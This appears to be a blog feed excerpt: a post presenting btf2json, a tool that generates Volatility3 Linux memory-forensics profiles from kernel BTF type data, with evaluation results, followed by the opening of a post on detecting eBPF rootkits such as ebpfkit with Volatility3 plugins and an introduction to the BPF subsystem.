<p>Why yet another solution you may ask? Well, to the best of my knowledge, none of the proposed solutions has seen widespread adoption as of now. My hope is that the simplicity of our approach might mean that it can make generating profiles for images that meet <em>certain requirements</em> as easy as running a cli tool against it and waiting for a few seconds or so. No need to do some complicated setup, download tons of dependencies, compile a thousand Linux kernels with an aging clang fork, and to wait dozens of minutes or even hours for the profile to be finished - just download the binary and you are good to go <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. In short, our approach is less general, but hopefully more practical than previous work.</p>

<h2 id="whats-our-solution-meet-the-bpf-type-format-btf">What’s our solution? Meet The BPF Type Format (BTF)!</h2>

<p>You might have heard about <a href="https://datatracker.ietf.org/wg/bpf/about/">BPF</a>, if not, think of it as an abstract machine with its own bytecode format (a bit like the JVM or WASM). The Linux kernel has its own implementation of this abstract machine, the Linux BPF runtime, i.e., it can execute BPF bytecode programs. The whole point of this subsystem is to have a flexible, fast, safe, and portable way to extend the kernel at runtime. For example, I recently started using the <a href="https://github.com/evilsocket/opensnitch">opensnitch</a> application-level firewall, and it is in fact enforcing its network policies via multiple BPF programs.</p>

<p>Wait, did you just say <em>portable</em> kernel extensions?!? But how can a program that is compiled to some assembly-like bytecode language and operates on kernel data structures in memory be portable across kernel versions? After all code like:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">my_struct</span> <span class="p">{</span>
<span class="cp">#ifdef BAR
</span>    <span class="kt">long</span> <span class="n">bar</span><span class="p">;</span>
<span class="cp">#else
</span>    <span class="kt">long</span> <span class="n">foo</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">long</span> <span class="nf">read_foo</span><span class="p">(</span><span class="k">struct</span> <span class="n">my_struct</span><span class="o">*</span> <span class="n">x</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">my_struct</span><span class="o">-&gt;</span><span class="n">foo</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>should be compiled down to instructions that have things like “Is a <code class="language-plaintext highlighter-rouge">long</code> 4 or 8 bytes?” or “Was <code class="language-plaintext highlighter-rouge">BAR</code> defined?” hard coded inside them. The solution to this apparent paradox lies in the interplay of four components: the <a href="https://clang.llvm.org/docs/AttributeReference.html#preserve-access-index"><code class="language-plaintext highlighter-rouge">preserve-access-index</code> C-language attribute</a>, the compiler toolchain, the user-space dynamic loader, and the kernel that the program should be loaded into.</p>

<p>In the program’s C source code, structures/unions whose member accesses should be portable must be marked with the <code class="language-plaintext highlighter-rouge">preserve-access-index</code> attribute <sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>. The compiler will then generate the accessing code without hard-coded offsets and record which field of which type was accessed at a particular location in <a href="https://www.kernel.org/doc/html/latest/bpf/llvm_reloc.html#co-re-relocations">relocation information</a>. This information is processed by the user-space dynamic loader running on the target system, which adjusts the program to the layout of types in the running kernel before loading it. The information about memory layout of types is supplied by the running kernel itself via the files in the <code class="language-plaintext highlighter-rouge">/sys/kernel/btf/</code> pseudo file system.</p>

<p>Whaaat? Each and every kernel out there that wants to support portable BPF programs (pretty much every single one) must ship with a description of the memory layout of all its types? That’s like having Christmas and your birthday together! Indeed, the relevant information is stored in the <code class="language-plaintext highlighter-rouge">.BTF</code> sections of the kernel and module ELF files in the <a href="https://www.kernel.org/doc/html/latest/bpf/btf.html">well documented BPF Type Format</a>.</p>

<p>This solves the whole <em>types</em> part of the “profile-generation-problem” for most modern kernels without the need for a debug build. Furthermore, since the kernel image is contiguous in physical memory, it is straight forward to carve the section from a memory image.</p>

<p><em>Note:</em> The reason why it is feasible to include the BTF information in production kernels is since it is much smaller than DWARF debug information. In part, this is achieved by the format being much less wasteful with disk space, however, it is also fundamentally less expressive. Thus, it is a priori not clear that BTF contains all the type information needed by memory forensics analyses. It was part of this work to establish that this is indeed the case (not too surprising given BTF’s original use case described above). I recommend <a href="https://nakryiko.com/posts/btf-dedup/">this post</a> for an introduction to the BTF format and its relationship to DWARF.</p>

<p><em>Note:</em> BTF has been around for quite a while, since <a href="https://github.com/torvalds/linux/commit/69b693f0aefa0ed521e8bd02260523b5ae446ad7">Linux 4.18</a> to be precise, so it is not like you will only find it in bleeding edge kernels.</p>

<h2 id="what-we-have">What we have!</h2>

<p>Let’s start with the good news: the <a href="https://github.com/vobst/btf2json">released prototype <code class="language-plaintext highlighter-rouge">btf2json</code></a> can generate working Volatility3 profiles! At the time of our evaluation, those profiles were even “better” than the ones generated by <code class="language-plaintext highlighter-rouge">dwarf2json</code>, in the sense that they supported more analyses on more memory images. It is also worth noting that the profile generation is about 10x faster.</p>

<p>Currently, <code class="language-plaintext highlighter-rouge">btf2json</code> accepts either an ELF <code class="language-plaintext highlighter-rouge">vmlinux</code> image or a raw <code class="language-plaintext highlighter-rouge">.BTF</code>-section for the type information, as well as a <code class="language-plaintext highlighter-rouge">System.map</code> file for symbol information, to generate a Volatility3 profile.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>btf2json <span class="nt">--help</span>
Generate Volatility 3 ISF files from BTF <span class="nb">type </span>information

Usage: btf2json <span class="o">[</span>OPTIONS]

Options:
      <span class="nt">--btf</span> &lt;BTF&gt;
          BTF file <span class="k">for </span>obtaining <span class="nb">type </span>information <span class="o">(</span>can also be a kernel image<span class="o">)</span>

      <span class="nt">--map</span> &lt;MAP&gt;
          System.map file <span class="k">for </span>obtaining symbol names and addresses

      <span class="nt">--banner</span> &lt;BANNER&gt;
          Linux banner.

          Mandatory <span class="k">if </span>using a BTF file <span class="k">for </span><span class="nb">type </span>information. Takes precedence over all other possible sources of banner information.

      <span class="nt">--version</span>
          Print btf2json version

      <span class="nt">--verbose</span>
          Display debug output

      <span class="nt">--debug</span>
          Display more debug output

      <span class="nt">--image</span> &lt;IMAGE&gt;
          Memory image to extract <span class="nb">type </span>and/or symbol information from <span class="o">(</span>not implemented<span class="o">)</span>

  <span class="nt">-h</span>, <span class="nt">--help</span>
          Print <span class="nb">help</span> <span class="o">(</span>see a summary with <span class="s1">'-h'</span><span class="o">)</span>
<span class="nv">$ </span>btf2json <span class="nt">--btf</span> path/to/vmlinux/or/btf/section <span class="nt">--map</span> path/to/system/map
<span class="c"># prints ISF to stdout</span>
</code></pre></div></div>

<p><em>Note</em>: If you use just the <code class="language-plaintext highlighter-rouge">.BTF</code>-section for type information, you also need to provide a Linux banner so that Volatility can match the profile to a memory image.</p>

<p>The resulting profile can then be used to drive Volatility analyses, just like any other profile that you would have previously generated with <code class="language-plaintext highlighter-rouge">dwarf2json</code>.</p>

<p>In its current form, <code class="language-plaintext highlighter-rouge">btf2json</code> already has one key advantage over <code class="language-plaintext highlighter-rouge">dwarf2json</code> (besides being much faster :P): no need for debug kernels! This means you can generate profiles for custom, self-compiled kernels (useful when investigating nerds like me) or distributions that do not provide kernel debug symbols (e.g., Arch Linux). Furthermore, you do not have to bother with figuring out the exact kernel release and searching the corresponding debug package in a gigantic repository. Just grab the <code class="language-plaintext highlighter-rouge">vmlinux</code> and <code class="language-plaintext highlighter-rouge">System.map</code> from the file system and you are good to go!</p>

<h3 id="evaluation">Evaluation</h3>

<p>We evaluated <code class="language-plaintext highlighter-rouge">btf2json</code> on the following kernels:</p>

<ul>
  <li>Almalinux 9
    <ul>
      <li>kernel: 5.14.0-362.8.1.el9_3.x86_64 (<code class="language-plaintext highlighter-rouge">f844e</code>)</li>
    </ul>
  </li>
  <li>Archlinux
    <ul>
      <li>kernel: 6.6.7-arch1-1 (<code class="language-plaintext highlighter-rouge">59a42</code>)</li>
      <li>kernel: 6.11.6-arch1-1 (<code class="language-plaintext highlighter-rouge">a54bd</code>)</li>
    </ul>
  </li>
  <li>Fedora 38
    <ul>
      <li>kernel: 6.6.6-100.fc38.x86_64 (<code class="language-plaintext highlighter-rouge">85565</code>)</li>
    </ul>
  </li>
  <li>Fedora 39
    <ul>
      <li>kernel: 6.6.6-200.fc39.x86_64 (<code class="language-plaintext highlighter-rouge">7bd7a</code>)</li>
      <li>kernel: 6.11.6-100.fc39.x86_64 (<code class="language-plaintext highlighter-rouge">d2be6</code>)</li>
    </ul>
  </li>
  <li>Fedora 40
    <ul>
      <li>kernel: 6.11.6-200.fc40.x86_64 (<code class="language-plaintext highlighter-rouge">bbbb3</code>)</li>
    </ul>
  </li>
  <li>Centos 9s
    <ul>
      <li>kernel: 5.14.0-391.el9.x86_64 (<code class="language-plaintext highlighter-rouge">20d08</code>)</li>
    </ul>
  </li>
  <li>Debian 11
    <ul>
      <li>kernel: 5.10.0-26-amd64 (<code class="language-plaintext highlighter-rouge">2c41e</code>)</li>
    </ul>
  </li>
  <li>Rocky 8
    <ul>
      <li>kernel: 4.18.0-513.9.1.el8_9.x86_64 (<code class="language-plaintext highlighter-rouge">9a6e2</code>)</li>
    </ul>
  </li>
  <li>Ubuntu 22.04
    <ul>
      <li>kernel: 5.15.0-88-generic (<code class="language-plaintext highlighter-rouge">6f76f</code>)</li>
    </ul>
  </li>
  <li>Ubuntu 23.10
    <ul>
      <li>kernel: 6.5.0-10-generic (<code class="language-plaintext highlighter-rouge">ccbb5</code>)</li>
    </ul>
  </li>
  <li>Kali Rolling
    <ul>
      <li>kernel: 6.11.2-amd64 (<code class="language-plaintext highlighter-rouge">c0965</code>)</li>
    </ul>
  </li>
</ul>

<p>For each kernel, we</p>

<ul>
  <li>used <code class="language-plaintext highlighter-rouge">dwarf2json</code> (with normal kernel + system map) and <code class="language-plaintext highlighter-rouge">btf2json</code> (with debug kernel + system map) to generate a profile (we also measured the time this took the tools),</li>
  <li>booted the kernel in a VM,</li>
  <li>took a memory snapshot of the VM,</li>
  <li>ran all upstream Volatility3 Linux analysis plugins on the memory image, with the debug output cranked up to the highest level.</li>
</ul>

<p>For each analysis the</p>

<ul>
  <li>exit code,</li>
  <li>stdout stream,</li>
  <li>stderr stream,</li>
</ul>

<p>were saved.</p>

<p>We then compared the exit codes, and diffed the stdout and stderr streams, of the analysis plugins with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> and <code class="language-plaintext highlighter-rouge">btf2json</code> profiles, respectively. Cases where the exit code and/or the stdout/stderr streams differed were manually investigated.</p>

<p>In total, we evaluated 32 analysis plugins on memory images of 13 different kernels, resulting in a total of <strong>416 unique pairs of memory image and analysis plugin</strong>.</p>

<ul>
  <li>In 394 cases the exit codes of the plugins running with the <code class="language-plaintext highlighter-rouge">btf2json</code>- and <code class="language-plaintext highlighter-rouge">dwarf2json</code>-generated profiles were identical.</li>
  <li>In 9 cases the <code class="language-plaintext highlighter-rouge">btf2json</code> profile lead to a successful analysis while the analysis with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profile failed. This was the case for the <code class="language-plaintext highlighter-rouge">linux.capabilities.Capabilities</code> plugin on all images but Fedora, Ubuntu 23.10, Kali and Archlinux (5 images), and for the <code class="language-plaintext highlighter-rouge">linux.check_syscall.Check_syscall</code> plugin on Fedora (4 images).</li>
  <li>In 13 cases the analysis failed with both plugins. This was the case for the <code class="language-plaintext highlighter-rouge">linux.vmayarascan.VmaYaraScan</code> plugin on all images.</li>
</ul>

<p>We tracked the reason for the failure of the <code class="language-plaintext highlighter-rouge">linux.capabilities.Capabilities</code> analysis with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profiles down to the fact that they assigned the <code class="language-plaintext highlighter-rouge">kernel_cap_t</code> type for the capabilities in <code class="language-plaintext highlighter-rouge">struct cred</code> while <code class="language-plaintext highlighter-rouge">btf2json</code> assigned the <code class="language-plaintext highlighter-rouge">struct kernel_cap_struct</code> type. While those are in fact related via a typedef, the Volatility3 framework differentiates between them in their implementation to obtain the capability bits. In particular, Volatility uses this distinction to differentiate between pre and post 6.3 kernels (which is why it works on Fedora, Ubuntu, Kali, and Arch), so we believe that there is a bug in the interplay of <code class="language-plaintext highlighter-rouge">dwarf2json</code>-profiles and Volatility on older kernels.</p>

<p>Concerning the failure of the <code class="language-plaintext highlighter-rouge">linux.check_syscall.Check_syscall</code> plugin on Fedora, we did not perform an in-depth investigation, however, it seems to be due to issues in the type information of the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profile. With the <code class="language-plaintext highlighter-rouge">btf2json</code> profile the system call table is correctly extracted.</p>

<p>Finally, the <code class="language-plaintext highlighter-rouge">linux.vmayarascan.VmaYaraScan</code> counts as a failure since it throws an exception if no rules are given.</p>

<p>Apart from the 9 cases where only the <code class="language-plaintext highlighter-rouge">btf2json</code> analysis was successful, the stdout streams of the analyses were identical. On the stderr streams, we observed slight differences in the <code class="language-plaintext highlighter-rouge">DEBUG</code>-level log messages that hint at differing inconsistencies in the type information of the profiles (<code class="language-plaintext highlighter-rouge">volatility3.framework.symbols: Unresolved reference: </code> messages). On average, running all analyses over an image with the <code class="language-plaintext highlighter-rouge">btf2json</code> profile reports 65 unique inconsistencies, whereas a run with the <code class="language-plaintext highlighter-rouge">dwarf2json</code> profile detects 90 such inconsistencies.</p>

<p>With regards to the average runtime, our evaluation showed that the profile generation of <code class="language-plaintext highlighter-rouge">btf2json</code> (1.54s) is significantly faster than that of <code class="language-plaintext highlighter-rouge">dwarf2json</code> (18.5s), i.e., we see a 12x speedup.</p>

<p><em>Note:</em> For the evaluation, we used Volatility3 at commit <code class="language-plaintext highlighter-rouge">a00a59cd235cb18b7dc28ccf2669e2a82368fab5</code>, <code class="language-plaintext highlighter-rouge">btf2json</code> at commit <code class="language-plaintext highlighter-rouge">18bd9d1015a7433a85ac2634a7a4f34f6d04c851</code>, and <code class="language-plaintext highlighter-rouge">dwarf2json</code> at commit <code class="language-plaintext highlighter-rouge">9f14607e0d339d463ea725fbd5c08aa7b7d40f75</code>.</p>

<h2 id="symbols-are-only-partially-solved">Symbols Are Only Partially Solved</h2>

<p>Sounds great, right? Well, unfortunately I must admit that <code class="language-plaintext highlighter-rouge">btf2json</code> has a dirty secret: the <code class="language-plaintext highlighter-rouge">symdb</code>.</p>

<p>Recall that we defined a symbol as the triple of <code class="language-plaintext highlighter-rouge">(name, location, type)</code>. We can get the names and locations from the <code class="language-plaintext highlighter-rouge">System.map</code>. However, while BTF is technically able to encode the types of global variables via the <a href="https://www.kernel.org/doc/html/latest/bpf/btf.html#btf-kind-var"><code class="language-plaintext highlighter-rouge">BTF_KIND_VAR</code></a> and <a href="https://www.kernel.org/doc/html/latest/bpf/btf.html#btf-kind-datasec"><code class="language-plaintext highlighter-rouge">BTF_KIND_DATASEC</code></a> entries, this is only done for the 400ish per-CPU variables. This leads us to our problem: How do we assign types to symbols?</p>

<p>Let’s take a step back and ask ourselves why we even <em>need</em> the type as part of our definition of a symbol. Symbols are usually the “entry point” for an analysis. Think of an analysis that lists all tasks, it will usually start at the <code class="language-plaintext highlighter-rouge">init_task</code> symbol, and then traverse the dynamically allocated doubly linked list that hangs off it. This stage of “getting a foot into the door” is where the type of a symbol is needed, and in my experience each analysis is only using a handful of symbols for that purpose.</p>

<p>Therefore, we decided to measure for which symbols their types are accessed by the existing Volatility analyses. To do so we instrumented the <a href="https://github.com/volatilityfoundation/volatility3/blob/1e871af0644fbd03ba22085241ed795104ccc580/volatility3/framework/interfaces/symbols.py#L60">method responsible for retrieving the type of a symbol</a> and re-ran all analyses. We found that <strong>32</strong>, of the 150k+, unique symbols have their type accessed. See the Appendix for a <a href="#Appendix-A:-Accessed-Symbols">list of those symbols</a>.</p>

<p>As we can see, it is only a tiny fraction of the 150k+ symbols that exist in a Linux kernel.</p>

<p>This leads me to a bold claim: It is feasible to build and maintain a map <code class="language-plaintext highlighter-rouge">([kernel m.m.p version], symbol name) -&gt; (type name)</code> that works in practice.</p>

<p>I believe that this works for three reasons:</p>

<ol>
  <li>The subset of symbols that are actually used by analyses is fairly small.</li>
  <li>The type names of these symbols are very stable between kernel versions.</li>
  <li>The type names of these symbols do not depend on build-time configuration options.</li>
</ol>

<p>We call this mapping <code class="language-plaintext highlighter-rouge">symdb</code> and embed it into the final, stand-alone <code class="language-plaintext highlighter-rouge">btf2json</code> executable. Thus, under the above assumptions, <code class="language-plaintext highlighter-rouge">btf2json</code> can generate working profiles just from a kernel’s BTF information and <code class="language-plaintext highlighter-rouge">System.map</code>.</p>

<p><em>Note</em>: This solution is, in general, inferior to what <code class="language-plaintext highlighter-rouge">dwarf2json</code> does. The <code class="language-plaintext highlighter-rouge">symdb</code> will contain missing or wrong entries. I just believe that the entries <em>that matter</em> will be correct due to the above considerations.</p>

<p><em>Note</em>: Currently the <code class="language-plaintext highlighter-rouge">symdb</code> is a mapping <code class="language-plaintext highlighter-rouge">(symbol name) -&gt; (type name)</code> generated of some kernel I had laying around (and it still works fine for Linux 4.18-6.11!!!). Generating a proper <code class="language-plaintext highlighter-rouge">symdb</code> and rigorously evaluating the approach is part of the future work outlined below.</p>

<h2 id="call-to-action">Call to Action</h2>

<p>Now, as I said above, I consider this work to be in a half-finished-but-usable state. It can already bring a real benefit to the community, but it is far from reaching its full potential. Thus, here is my vision of what <code class="language-plaintext highlighter-rouge">btf2json</code> could become through the investment of considerable time and energy (which I currently do not have). If the community decides that it is a goal worth pursuing, I am confident that we can get there.</p>

<h3 id="working-on-a-raw-memory-image">Working on a Raw Memory Image</h3>

<p>Recall that the ultimate goal of automatic profile generation is to generate the profile off a raw memory image. For that to work we would roughly need to add the following things:</p>

<ul>
  <li><strong>Carve the banner from the image</strong> (conceptually trivial, little work).</li>
  <li><strong>Carve the <code class="language-plaintext highlighter-rouge">.BTF</code> section from the image</strong> (conceptually simple, little to medium work). Scanning for the magic bytes <code class="language-plaintext highlighter-rouge">0xeb9f</code> and performing some heuristic checks on matches is sufficient, we already prototyped and evaluated this.</li>
  <li><strong>Extract kallsyms from the image</strong>, either
    <ul>
      <li>using a carving approach like <a href="https://github.com/marin-m/vmlinux-to-elf"><code class="language-plaintext highlighter-rouge">vmlinux-to-elf</code></a> (conceptually simple, loooots of work),</li>
      <li>using an emulation approach like academic papers (conceptually advanced, medium work). This introduces some big dependencies that make shipping a stand-alone cross-platform executable hard.</li>
    </ul>
  </li>
</ul>

<p><em>Note</em>: <code class="language-plaintext highlighter-rouge">kallsyms</code> in memory may contain the addresses with ASLR offsets while the <code class="language-plaintext highlighter-rouge">System.map</code> has an ASLR-slide of zero. One would either need to find a way to adjust them or teach Volatility to work with “real” addresses, which would tie the profile to a particular image. I have a rough idea how to do the former: scan for swapper as usual, transition to its root page tables via symbol information, reconstruct page tables and read off slide of kernel region.</p>

<p><em>Note:</em> This obviously only works for kernels compiled with <code class="language-plaintext highlighter-rouge">KALLSYMS=y</code>.</p>

<h3 id="evaluating-the-symdb-approach">Evaluating the <code class="language-plaintext highlighter-rouge">symdb</code> Approach</h3>

<p>Currently, everything around the <code class="language-plaintext highlighter-rouge">symdb</code> is more or less just me eyeballing based on my (limited) experience that “this stuff should probably work” and our small-scale evaluation. Anyway, we need to actually implement and evaluate this for real!</p>

<ul>
  <li><strong>Building and automatically maintaining the <code class="language-plaintext highlighter-rouge">symdb</code> as it was described above</strong> (conceptually difficult, lots of work). For this we need at the very least the preprocessed C code but working with LLVM IR would be a lot nicer. Then, the extraction of type names for all global symbols is possible for the C code and easy for the LLVM IR. One issue I already see is that to get the preprocessed C code one needs to make choices for all configuration options, and the set of symbols depends on those options - some sort of compromise will be needed here.</li>
  <li><strong>Evaluating the <code class="language-plaintext highlighter-rouge">symdb</code> and its underlying assumptions</strong> (conceptually simple, medium work). By using DWARF as ground truth, it should be rather straightforward to evaluate the correctness of the <code class="language-plaintext highlighter-rouge">symdb</code> mapping.</li>
</ul>

<p>That’s it, thanks for reading!</p>

<h2 id="appendix-a-accessed-symbols">Appendix A: Accessed Symbols</h2>

<p>List of all symbols whose type is queried when running all Volatility3 analysis plugins. This data was generated by instrumenting the <code class="language-plaintext highlighter-rouge">get_type</code> method of the <code class="language-plaintext highlighter-rouge">SymbolInterface</code>.</p>

<p><em>Note</em>: We excluded <code class="language-plaintext highlighter-rouge">linux.check_syscall.CheckSyscall</code> as this plugin iterates over (all) symbols and calls <code class="language-plaintext highlighter-rouge">get_symbol</code> which, accesses the type for caching purposes. However, it does not use the type information.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__sched_class_highest
__sched_class_lowest
_etext
_text
cap_last_cap
dl_sched_class
fair_sched_class
idle_sched_class
idt_table
init_files
init_mm
init_pid_ns
init_task
iomem_resource
keyboard_notifier_list
mod_tree
module_kset
modules
net_namespace_list
prb
prog_idr
rt_sched_class
socket_file_ops
sockfs_dentry_operations
stop_sched_class
tcp4_seq_afinfo
tcp6_seq_afinfo
tty_drivers
udp4_seq_afinfo
udp6_seq_afinfo
udplite4_seq_afinfo
udplite6_seq_afinfo
</code></pre></div></div>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>Not to mention all the self-compiled kernels that do not have publicly available binary packages at all. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>Sorry Windows users, no pre-compiled binaries for you – WSL for the win! <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>Alternatively, a portable program can make use of <a href="https://gcc.gnu.org/onlinedocs/gcc/BPF-Built-in-Functions.html">compiler built-ins</a> that can be combined to achieve the same effect, but allow it to do even crazier things, like testing whether a field of an enum exists. I recommend reading <a href="https://nakryiko.com/posts/bpf-core-reference-guide/">this post</a> if you are interested in learning more about the mechanics of portable programs. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name></name></author><summary type="html"><![CDATA[This post is about some work that I did on automatic profile generation for memory forensics of Linux systems. To be upfront about it: This work is somewhat half-finished – it already does something quite useful, but it could do a lot more, and it has not been evaluated thoroughly enough to be considered “production ready”. The reason I decided to publish it anyway is that I believe that there is an interesting opportunity to change the way in which we generate profiles for the analysis of Linux memory images in practice. However, in order for it to become a production tool, at least one outstanding problem has to be addressed (I have some ideas on that one) and lots of coding work needs to be done – and I simply do not have the resources to work on that right now.]]></summary></entry><entry><title type="html">BPF Memory Forensics with Volatility 3</title><link href="https://blog.eb9f.de/2023/12/21/bpf_memory_forensics_with_volatility_3.html" rel="alternate" type="text/html" title="BPF Memory Forensics with Volatility 3" /><published>2023-12-21T00:00:00+00:00</published><updated>2023-12-21T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/12/21/bpf_memory_forensics_with_volatility_3</id><content type="html" xml:base="https://blog.eb9f.de/2023/12/21/bpf_memory_forensics_with_volatility_3.html"><![CDATA[<p>Have you ever wondered how an eBPF rootkit looks like? Well, here’s one, have a good look:</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/ubuntu-20.04-LTS-focal-ebpfkit.png" alt="ubuntu-20.04-LTS-focal-ebpfkit.png" /></p>

<p>Upon receiving a command and control (C2) request, this specimen can execute arbitrary commands on the infected machine, exfiltrate sensitive files, perform passive and active network discovery scans (like <code class="language-plaintext highlighter-rouge">nmap</code>), or provide a privilege escalation backdoor to a local shell. Of course, it’s also trying its best to hide itself from system administrators hunting it with different command line tools such as <code class="language-plaintext highlighter-rouge">ps</code>, <code class="language-plaintext highlighter-rouge">lsof</code>, <code class="language-plaintext highlighter-rouge">tcpdump</code> an others or even try tools like <code class="language-plaintext highlighter-rouge">rkhunter</code> or <code class="language-plaintext highlighter-rouge">chkrootkit</code>.</p>

<p>Well, you say, rootkits have been doing that for more than 20 years now, so what’s the news here? The news aren’t that much the features, but rather how they are implemented. Everything is realized using a relatively new and rapidly evolving kernel feature: eBPF. Even though it has been in the kernel for almost 10 years now, we’re regularly surprised by how many experienced Linux professionals are still unaware of its existence, not even to mention its potential for abuse.</p>

<p>The above picture was generated from the memory image of a system infected with <a href="https://github.com/Gui774ume/ebpfkit"><code class="language-plaintext highlighter-rouge">ebpfkit</code></a>, an open-source PoC rootkit from 2021, using a plugin for the <a href="https://github.com/volatilityfoundation/volatility3">Volatility 3</a> memory forensics framework. In this blog post, we will present a total of seven plugins that, taken together, facilitate an in depth analysis of the state of the BPF subsystem.</p>

<p>We structured this post as follows: The next section provides an introduction to the BPF subsystem, while the third section highlights its potential for (ab)use by malware. In section four, we will introduce seven Volatility 3 plugins that facilitate the examination of BPF malware. Section five presents a case study, followed by a section describing our testing and evaluation of the plugins on various Linux distributions.
In the last section, we conclude with a discussion of the steps that are necessary to integrate our work into the upstream Volatility project, other challenges we encountered, and open research questions.</p>

<p><em>Note: The words “eBPF” and “BPF” will be used interchangeably throughout this post.</em></p>

<h2 id="the-bpf-subsystem">The BPF Subsystem</h2>

<p>Before delving into the complexities of memory forensics, it is necessary to establish some basics about the BPF subsystem. Readers that are already familiar with the topic can safely skip this section.</p>

<p>To us, BPF is first of all an <strong>instruction set architecture (ISA)</strong>. It has ten general purpose registers, which are 64 bit wide, and there are all of the basic operations that you would expect a modern ISA to have. Its creator, Alexei Starovoitov, once described it as a kind of simplified x86-64 and would probably never have imagined that the ISA he cooked up back in 2014 would once enter a standardization process at the IETF. The interested reader can find the current proposed standard <a href="https://datatracker.ietf.org/doc/draft-ietf-bpf-isa/">here</a>. Of course, there are all the other things that you would expect to come with an ISA, like an ABI that defines the calling convention, and a binary encoding that maps instructions to sequences of four or eight bytes.</p>

<p>The BPF ISA is used as a compilation target (currently by clang - gcc support is on the way) for programs written in high-level languages (currently C and Rust), however, it is not meant to be implemented in hardware. Therefore, it is conceptually more similar to WebAssembly or Java Bytecode than x86-64 or arm64, i.e., BPF programs are meant to be executed by a <strong>runtime</strong> that implements the BPF virtual machine (VM). Several BPF runtimes exist, but the “reference implementation” is in the Linux kernel.</p>

<p>Runtimes are, of course, free to choose how they implement the BPF VM. The instruction set was defined in a way that makes it easy to implement a one-to-one just in time (JIT) compiler for many CPU architectures. In fact, in the Linux kernel, even non-mainstream architectures like powerpc, sparc or s390 have BPF JITs. However, the kernel also has an <a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/core.c#L1648">interpreter</a> to run BPF programs on architectures that do not yet support JIT compilation.</p>

<p>Aside: <em>The BPF platform is what some call a “<strong>verified</strong> target”. This means that in order for a program to be valid it has to have some “non-local” properties. Those include the absence of (unbounded) loops, registers and memory can only be read after they have been written to, the stack depth may not exceed a hard limit, and many more. The interested reader can find a more exhaustive description <a href="https://www.kernel.org/doc/html/latest/bpf/verifier.html">here</a>. In practice, runtime implementations include an up-front static verification stage and refuse to execute programs that cannot be proven to meet these requirements (some runtime checks may be inserted to account for the known shortcomings of static analysis). This static verification approach is at the hearth of BPF’s sandboxing model for untrusted code.</em></p>

<p>Roughly speaking, the BPF subsystem includes, besides the implementation of the BPF VM, a user and kernel space interface for managing the program life cycle as well as infrastructure for transitioning the kernel control flow in and out of programs running inside the VM. Other subsystems can be made “programmable” by integrating the BPF VM in places where they want to allow the calling of user-defined functions, e.g., for decision making based on their return value. The networking subsystem, for example, supports handing all incoming and outgoing packets on an interface to a BPF program. Those programs can freely rewrite the packet buffer or even decide to drop the packet all together. Another example is the tracing subsystem that supports transitioning control into BPF programs at essentially any instruction via one of the various ways it has to hook into the kernel and user space execution. The final example here is the Linux Security Module (LSM) subsystem that supports calling out to BPF programs at any of its security hooks placed at handpicked choke points in the kernel. There are many more examples of BPF usage in the kernel and even more in <a href="https://dl.acm.org/doi/proceedings/10.1145/3609021">academic research papers</a> and patches on the mailing list, but we guess we conveyed the general idea.</p>

<p>BPF programs can interact with the world outside of the VM via so called <strong>helpers</strong> or <strong>kfuncs</strong>, i.e., native kernel functions that can be called by BPF programs. Services provided by these functions range from getting a timestamp to sending a signal to the current task or reading arbitrary memory. Which functions a program can call depends on the <em>program type</em> that was selected when loading it into the VM. When reversing BPF programs, looking for calls to interesting kernel functions is a good point to start.</p>

<p>The second ingredient you need in order to get any real work done with a BPF program are <strong>maps</strong>. While programs can store data during their execution using stack memory or by allocating objects on the heap, the only way to persist data across executions of the same program are maps. Maps are mutable persistent key value stores that can be accessed by BPF programs and user space alike, as such they can be used for user-to-BPF, BPF-to-user, or BPF-to-BPF communication, where in the last case the communicating programs may be different or the same program at different times.</p>

<p>Another relevant aspect of the BPF ecosystem is the promise of <strong>compile once run everywhere (CORE)</strong>, i.e., a (compiled) BPF program can be run inside of a wide range of Linux kernels that might have different configurations, versions, compilers, and even CPU architectures. This is achieved by having the compiler emit special relocation entries that are processed by a user-space loader prior to loading a program into the kernel’s BPF VM. The key ingredient that enables this approach is a self-description of the running kernel in the form of BPF Type Format (BTF) information, which is made available in special files under <code class="language-plaintext highlighter-rouge">/sys/kernel/btf/</code>. For example, BPF source code might do something like <code class="language-plaintext highlighter-rouge">current-&gt;comm</code> to access the name of the process in whose context the program is running. This might generate an assembly instruction that adds the offset of the <code class="language-plaintext highlighter-rouge">comm</code> field to a pointer to the task descriptor that is stored in a register, i.e., <code class="language-plaintext highlighter-rouge">ADD R5, IMM</code>. However, the immediate offset might vary due to kernel version, configuration, structure layout randomization or CPU architecture. Thus, the compiler would emit a relocation entry that tells the user-space loader running on the target system to check the kernel’s BTF information in order to overwrite the placeholder with the correct offset. Together with other kinds of relocations, which address things like existence of types and enum variants or their sizes, the loader be used to run the same BPF program on a considerable number of kernels.</p>

<p>Aside: <em>A problem with the CORE implementation described above is that signatures over BPF programs are meaningless as the program text will be altered by relocations before loading. To allow for a meaningful ahead of time signature there is another approach in which a loader program is generated for the actual program. The loader program is portable without relocations and is signed and loaded together with the un-relocated bytecode of the actual program. Thus, the problem is solved as all text relocations happen in the kernel, i.e., after signatures have been verified.</em></p>

